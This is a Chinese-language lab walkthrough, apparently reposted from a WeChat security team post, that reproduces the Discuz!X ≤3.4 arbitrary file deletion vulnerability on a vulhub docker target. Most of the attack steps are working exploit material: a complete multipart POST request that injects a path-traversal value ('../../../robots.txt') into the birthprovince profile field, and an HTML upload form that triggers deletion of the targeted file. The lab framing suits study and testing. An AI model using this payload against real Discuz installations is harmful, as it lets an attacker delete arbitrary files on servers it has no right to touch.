(1)进入docker的vulhub靶场,进入discuz并下载环境
(2)下载完后,docker ps -a
(3)在浏览器访问ip下的robots.txt文件,是存在的
(4)进入http://your-ip/member.php?mod=register,f12,获取formhash的值:662a9694
(5)随便一个页面进行抓包,获取cookie的值
(6)使用以下payload在bp进行发包
POST /home.php?mod=spacecp&ac=profile&op=baseHTTP/1.1
Host: localhost
Content-Length: 367
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryPFvXyxL45f34L12s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: [your cookie]
Connection: close
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data;name="formhash"
[your formhash]
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data;name="birthprovince"
../../../robots.txt
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data;name="profilesubmit"
1
------WebKitFormBoundaryPFvXyxL45f34L12s--
(7)发完包后,刷新页面,可以看到用户资料修改页面上的出生地就会显示成下图所示的状态:
说明我们的脏数据已经进入数据库了
(8)在本地新建一个html文档,输入以下代码,其中[your-ip]改成discuz的域名,[form-hash]改成你的formhash
<body>
<formaction="http://[your-ip]/home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=[form-hash]"method="post" enctype="multipart/form-data">
<inputtype="file" name="birthprovince" />
<inputtype="submit" value="upload" />
</form>
</body>
(9)用浏览器打开该页面,上传一个正常图片。此时脏数据应该已被提取出,漏洞已经利用结束。
(10)robots.txt文件被删除
原文始发于微信公众号(GSDK安全团队):Discuz!X ≤3.4 任意文件删除漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论